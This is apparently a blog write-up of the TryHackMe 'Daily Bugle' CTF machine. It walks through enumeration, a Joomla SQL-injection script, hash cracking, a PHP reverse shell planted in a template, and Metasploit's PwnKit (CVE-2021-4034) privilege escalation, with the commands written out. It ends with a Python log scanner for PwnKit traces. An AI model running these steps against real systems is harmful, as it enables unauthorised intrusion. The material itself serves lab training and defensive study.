Daily Bugle - TryHackMe

shark0x01
Sep 14, 2022

Today we will solve Daily Bugle from TryHackMe.

First, let's start with some enumeration.

sudo nmap -sC -sV -oA nmap/bugle 10.10.200.135

We found:

  • SSH on 22
  • HTTP running Apache on 80
  • MySQL running MariaDB on 3306

nmap revealed that robots.txt contains interesting paths.

Now let's check the website by going to http://10.10.200.135

Good one :) jonah truly hates spiderman (answer to question 1)

OK, let's check robots.txt.

Now we know it's a Joomla website, so let's go to /administrator/.

Let's run joomscan, since neither the website nor the panel reveals the
version number.

joomscan -u http://10.10.203.230

Now we know the version number. Unfortunately, we didn't find any core
vulnerabilities with joomscan.

Searching Google for public exploits, we found a Python script on GitHub
called JoomBlah. Let's download it and run it.

python2 joomblah.py http://10.10.200.135

We got the username and the password hash for jonah.

It's a bcrypt(md5) hash. You can use either John the Ripper or Hashcat to crack it; I will use Hashcat and rockyou.txt.

hashcat.exe -m 3200 {filewithhashes} {wordlist}

Password: spiderman123

After that I tried to SSH to the machine, but it didn't work.
OK, let's continue with the website: go to the panel and sign in with the creds (jonah:spiderman123).

Our goal now is to get a reverse shell. Go to Templates.

Go to any PHP file and use the PHP shell from pentestmonkey.
After getting a shell you may want to upgrade it:

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo ; fg
Enter + Enter
export TERM=xterm

Unfortunately, I couldn't upgrade my shell due to some weird stuff with ZSH,
so I created a payload with msfvenom and uploaded it to the machine.

Then I created a handler.

OK, now that we have a proper shell, let's dive into the box.
I couldn't get the user.txt file with apache privileges, so I decided to go straight to privesc.

Note:
This is not the intended way to solve it.
I abused CVE-2021-4034, which was probably published after the machine was released and which the author forgot to patch.
So, the intended way was to find configuration.php in the website folder,
use those creds to log in, then privesc using 'yum'. :(
Sorry for the inconvenience.

We are already in a meterpreter session, so let's run the local exploit suggester.

run post/multi/recon/local_exploit_suggester

Now background the current session using the background command.

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set lhost tun0
set lport 1337
set WRITABLE_DIR /dev/shm
run

Now wait for the session.

Now we are root; you can read both user.txt and root.txt.
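For the defensive side of the pkexec step above: the Qualys advisory for CVE-2021-4034 names two pkexec log messages that its exploitation technique can leave behind, and the sketch below searches auth-log lines for them. This is an added example, not part of the original write-up; the syslog layout, host names and sample lines are constructed assumptions.

```python
import re

# pkexec messages the Qualys advisory for CVE-2021-4034 names as traces.
# The second is matched loosely so a spelling difference does not cause a miss.
TRACES = (
    re.compile(r"The value for the SHELL variable was not found"),
    re.compile(r"The value for environment variable \S+ contains sus\w+ content"),
)
# Assumed layout: "Mon DD HH:MM:SS host pkexec[pid]: [invoker: ]message [CWD=...]"
SYSLOG = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\spkexec\[(?P<pid>\d+)\]:\s(?P<msg>.*)$"
)
INVOKER = re.compile(r"^(?P<invoker>[^\s:\[]+): ")
CWD = re.compile(r"\[CWD=(?P<cwd>[^\]]*)\]")

def find_pwnkit_traces(lines):
    """Return one dict per pkexec log line that carries a known trace."""
    findings = []
    for line in lines:
        entry = SYSLOG.match(line.rstrip("\n"))
        if entry is None:
            continue  # not written by pkexec
        msg = entry.group("msg")
        if not any(t.search(msg) for t in TRACES):
            continue  # ordinary pkexec use
        invoker, cwd = INVOKER.match(msg), CWD.search(msg)
        findings.append({
            "timestamp": entry.group("ts"),
            "host": entry.group("host"),
            "pid": int(entry.group("pid")),
            "invoker": invoker.group("invoker") if invoker else None,
            "cwd": cwd.group("cwd") if cwd else None,
        })
    return findings

# Constructed sample lines, not captured from the Daily Bugle machine.
SAMPLE_LOG = [
    "Sep 14 10:02:11 web01 sshd[901]: Failed password for jonah from 10.0.0.5 port 50112 ssh2",
    "Sep 14 10:05:40 web01 pkexec[2210]: apache: The value for the SHELL variable was not found"
    " the /etc/shells file [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=/usr/bin/true]",
    "Sep 14 10:06:02 web01 pkexec[2255]: admin: Executing command [USER=root]"
    " [TTY=/dev/pts/0] [CWD=/home/admin] [COMMAND=/usr/bin/systemctl restart httpd]",
    "Sep 14 10:07:19 web01 pkexec[2301]: The value for environment variable XAUTHORITY"
    " contains suspicious content",
]

if __name__ == "__main__":
    for hit in find_pwnkit_traces(SAMPLE_LOG):
        print(hit)
```

The same advisory notes that the bug can also be exploited without leaving these traces, so an empty result does not rule it out; updating polkit is the fix.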
